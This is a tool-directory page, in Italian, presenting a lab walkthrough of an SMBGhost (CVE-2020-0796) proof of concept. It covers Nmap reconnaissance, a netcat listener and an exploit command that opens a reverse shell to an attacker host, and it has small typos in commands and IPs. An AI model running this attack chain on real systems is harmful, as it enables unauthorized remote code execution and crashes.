Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/hungdnvp/poc-cve-2020-0796
RicognizioneAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingStrumento di Accesso Remoto
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

Exploit proof-of-concept per CVE-2020-0796 (SMBGhost) che prende di mira Windows 10/Server SMBv3.1.1. Include ricognizione con Nmap, scansione delle vulnerabilità e consegna di payload per reverse shell.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
POC-CVE-2020-0796 — Exploit proof-of-concept per CVE-2020-0796 (SMBGhost) che prende di mira Windows 10/Server SMBv3.1.1. Include ricognizione con Nmap, scansione delle vulnerabilità e consegna di payload per reverse shell. | Kitploit

**- Versioni interessate*

- Windows 10 Versione 1903 per sistemi a 32 bit

- Windows 10 Versione 1903 per sistemi basati su ARM64

- Windows 10 Versione 1903 per sistemi basati su x64

- Windows 10 Versione 1909 per sistemi a 32 bit

- Windows 10 Versione 1909 per sistemi basati su ARM64

- Windows 10 Versione 1909 per sistemi basati su x64

- Windows Server, versione 1903 (installazione Server Core)

- Windows Server, versione 1909 (installazione Server Core)

Schema di connessione del sistema

image-20240223154022321

Ricognizione del bersaglio

Avviare Nmap per scansionare la rete nella zona DMZ

root@kitploit:~
map -sS 192.168.116.0/24

nmap: è il nome del programma di scansione di rete.

-sS: Seleziona il metodo di scansione TCP SYN scan. In questa scansione, Nmap invia un pacchetto SYN all'host di destinazione e osserva la risposta. Se l'host di destinazione risponde con un pacchetto SYN-ACK, Nmap sa che la porta è aperta. Se l'host di destinazione risponde con un pacchetto RST, significa che la porta è chiusa.

192.168.116.0/24: Indirizzo IP o intervallo di indirizzi IP specifico che si desidera scansionare. In questo caso, l'intervallo è 192.168.116.0/24, che descrive tutti gli indirizzi IP da 192.168.116.1 a 192.168.116.254.

image-scanNmap

=> Si osserva che l'indirizzo IP della macchina vittima 192.116.145 ha la porta 445 aperta.

· Utilizzare Nmap per scansionare le vulnerabilità sulla macchina vittima

root@kitploit:~
map -p445 –script smb-protocols 192.168.116.145

nmap: è il nome del programma di scansione di rete.

-p445: Specifica la porta da scansionare, in questo caso la porta 445. La porta 445 è comunemente utilizzata per comunicare con il servizio SMB (Server Message Block) sui sistemi Windows.

--script smb-protocols: Seleziona lo script smb-protocols per eseguire la scansione. Questo script aiuta a controllare e visualizzare le informazioni sulle versioni del protocollo SMB supportate sull'host di destinazione.

192.168.116.145: Indirizzo IP dell'host che si desidera scansionare. In questo caso, l'indirizzo IP è 192.168.116.145.

image-sanNmap2

- Il risultato ottenuto da smb-protocols sulla macchina vittima indica una possibile vulnerabilità sfruttabile in SMBv3.1.1.

- Per maggiore certezza, si continua a verificare la possibilità di sfruttare la vulnerabilità CVE-2020-0796 eseguendo uno script Python.

[]: -https://github.com/ly4k/SMBGhost "codice exploit"

image-nmapcheck

=> Risultato Vulnerabile -> rilevata vulnerabilità CVE-2020-0796 sfruttabile sulla macchina vittima.

Sfruttamento della vulnerabilità, installazione del malware, creazione di un canale di controllo remoto

Eseguire l'attacco Reverse_shell

  • Avviare una sessione con Netcat in ascolto per la connessione dalla vittima*
root@kitploit:~
ncat -lvp 4444
  • Eseguire lo script di exploit CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "codice exploit"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> RISULTATO: La macchina attaccante ha ottenuto l'esecuzione del codice shell sulla macchina vittima.

image-result

Dopo una connessione riuscita, l'attaccante può sfruttare ed eseguire codice arbitrario sulla macchina vittima con i diritti dell'utente nella sessione di connessione.

Alla fine della sessione. La macchina vittima subisce un errore BlueScreen e si riavvia automaticamente.

image-end

*L'esecuzione dell'exploit potrebbe causare danni al sistema di destinazione*

Scarica lo strumento